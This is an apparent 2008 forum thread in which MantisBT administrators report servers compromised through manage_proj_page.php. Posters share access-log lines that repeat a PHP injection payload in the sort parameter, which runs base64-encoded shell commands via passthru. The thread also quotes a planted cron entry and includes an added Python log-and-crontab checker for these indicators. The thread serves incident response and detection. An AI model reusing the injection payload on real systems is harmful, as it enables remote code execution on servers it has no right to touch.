Hello
I don't know how, but someone was hacking my server today, and I think he used some security hole in Mantis.
He deleted each entry in my crontab and inserted this entry:
* * * * * /path_to_my_webroot/mantis/mc-root/update > /dev/null 2>&1
This creates in the Mantis directory a new directory named 'mc-root' with some system files in it, like:
bash, autorun, cron.d, vhosts etc.
I don't know how critical the content of these files is in an open web path, but I closed the Mantis directory directly with a .htaccess 'deny from all'.
Also I deleted this cron entry.
Then I wanted to save the 'mc-root' directory to my local Windows system. But my virus scanner announced a Linux Procfake virus in a file.
I think somebody used my Mantis version to upload this virus. One user has registered in Mantis at this time.
It is a user from Spain and I think he will not help to find some bugs in a German platform.
Does someone know any bug in Mantis with which this is possible?
My version is Mantis 1.1.2
cooper
Security problem?
Re: Security problem?
Today I got an email from my provider. In my Mantis program there is a security hole in the file manage_proj_page.php.
The PHP options allow_url_fopen and allow_url_include were deactivated.
Here is the log part:
75.127.107.0 - - [15/Nov/2008:08:36:44 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:36:48 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3758 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:15 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 4190 "-" "-"
75.127.107.0 - - [15/Nov/2008:08:37:20 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3866 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:00:24 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:09 +0100] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 0 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:11 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3783 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:14 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3794 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:29 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3659 "-" "-"
75.127.107.0 - - [15/Nov/2008:10:01:39 +0100] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3732 "-" "-"
I hope that is useful for someone.
cooper
Re: Security problem?
Got hit by this today as well. Here is the bug report.
I must have missed the CVE report somehow.
http://www.mantisbt.org/bugs/view.php?id=9704
Re: Security problem?
I've updated to 1.1.5. Today I got a notice that someone unexpected had registered a new account. Looking at httpd logs definitely showed someone was probing and then passing in code:
88.80.193.15 - - [27/Nov/2008:09:17:09 -0500] "GET /mantis/ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
88.80.193.15 - - [27/Nov/2008:09:17:10 -0500] "GET /mantis/login_page.php HTTP/1.1" 200 3122 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.18) Gecko/20081029 Firefox/2.0.0.18"
...
66.166.99.188 - - [27/Nov/2008:09:17:59 -0500] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:00 -0500] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 1230 "-" "-"
I don't see any evidence that the system's packages have been changed (checked rpm MD5s).
Since I'm running 1.1.5, I'm hopeful that my machine isn't actually compromised. Does anyone know if the above probes would lead to a new user being created without actually allowing the sql injection attack on manage_proj_page.php to succeed?
Re: Security problem?
arenson9 wrote:
> I've updated to 1.1.5. Today I got a notice that someone unexpected had registered a new account. Looking at httpd logs definitely showed someone was probing and then passing in code:
> 66.166.99.188 - - [27/Nov/2008:09:17:59 -0500] "GET /mantis/manage_proj_page.php HTTP/1.0" 302 - "-" "-"
> 66.166.99.188 - - [27/Nov/2008:09:18:00 -0500] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
> 66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 1230 "-" "-"
> I don't see any evidence that the system's packages have been changed (checked rpm MD5s).
> Since I'm running 1.1.5, I'm hopeful that my machine isn't actually compromised. Does anyone know if the above probes would lead to a new user being created without actually allowing the sql injection attack on manage_proj_page.php to succeed?

They have to create a user account first, then the manage_proj_page.php hack will work, but not with 1.1.5. If the hack works, in your httpd error log you will see a file being downloaded at the same time the manage_proj_page.php?sort=']... is called. In addition, the user account of your web server (e.g. apache) will have a crontab entry like the one listed elsewhere in this thread.
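A small checker for the two indicators this thread describes: the PHP code passed in manage_proj_page.php?sort= (as in the log lines posted above, correlated with the preceding login.php POST that the reply says is required) and the mc-root cron entry from cooper's first post. This is an added example, not code from the thread or from the MantisBT project; the Apache access-log layout and the crontab path are assumptions, and the sample input is two lines from the thread plus constructed entries.

```python
import re
from urllib.parse import unquote

# Apache access-log prefix (assumed): client, identd, user, [timestamp], "method target ..."
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)')
# Never legitimate in a ?sort= value: the break-out seen in this thread and the PHP exec primitives behind it
SUSPECT_FRAGMENTS = ("']);}", "error_reporting(0)", "passthru(", "base64_decode(")

def split_target(target):
    """Split a request target into path and decoded query params (parse_qs is avoided: older Pythons also split on ';')."""
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote(key), []).append(unquote(value))
    return path, params

def is_sort_injection(path, params):
    """True when manage_proj_page.php is requested with PHP code in the sort parameter."""
    if not path.endswith("/manage_proj_page.php"):
        return False
    return any(f in v for v in params.get("sort", []) for f in SUSPECT_FRAGMENTS)

def scan_access_log(text):
    """Return injection attempts, noting whether the same IP POSTed to login.php first (an account is needed, per the reply above)."""
    logged_in, hits = set(), []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        path, params = split_target(m.group("target"))
        if m.group("method") == "POST" and path.endswith("/login.php"):
            logged_in.add(m.group("ip"))
        if is_sort_injection(path, params):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "prior_login": m.group("ip") in logged_in})
    return hits

def suspicious_cron_entries(crontab_text):
    """Active crontab lines that run a binary out of an 'mc-root' directory (cooper's indicator)."""
    return [ln for ln in crontab_text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#") and "/mc-root/" in ln]

# Sample input: two lines arenson9 posted plus a constructed benign request, and a constructed crontab
SAMPLE_LOG = """\
66.166.99.188 - - [27/Nov/2008:09:18:00 -0500] "POST /mantis/login.php HTTP/1.0" 302 - "-" "-"
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 1230 "-" "-"
192.0.2.10 - - [27/Nov/2008:09:20:00 -0500] "GET /mantis/manage_proj_page.php?sort=name HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
"""
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * /var/www/html/mantis/mc-root/update > /dev/null 2>&1
"""
```

Run scan_access_log(SAMPLE_LOG) and suspicious_cron_entries(SAMPLE_CRONTAB) against your own access log and the web server user's crontab; a hit with prior_login set to True matches the sequence described in this thread.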
Re: Security problem?
Hit here today as well. From:
> The following account has been created:
>
> Username: feelings
> E-mail: nebehash@yahoo.com
> Remote IP address: 84.232.166.215 (Romania)
and
> The following account has been created:
>
> Username: edina
> E-mail: mantismail1@gmail.com
> Remote IP address: 85.10.204.17 (Germany)
Two different systems. The logs show no URLs like
66.166.99.188 - - [27/Nov/2008:09:18:01 -0500] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(_code_);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0"
and no cron, so maybe okay.
Not sure how they found one of these systems. The URL is not obvious.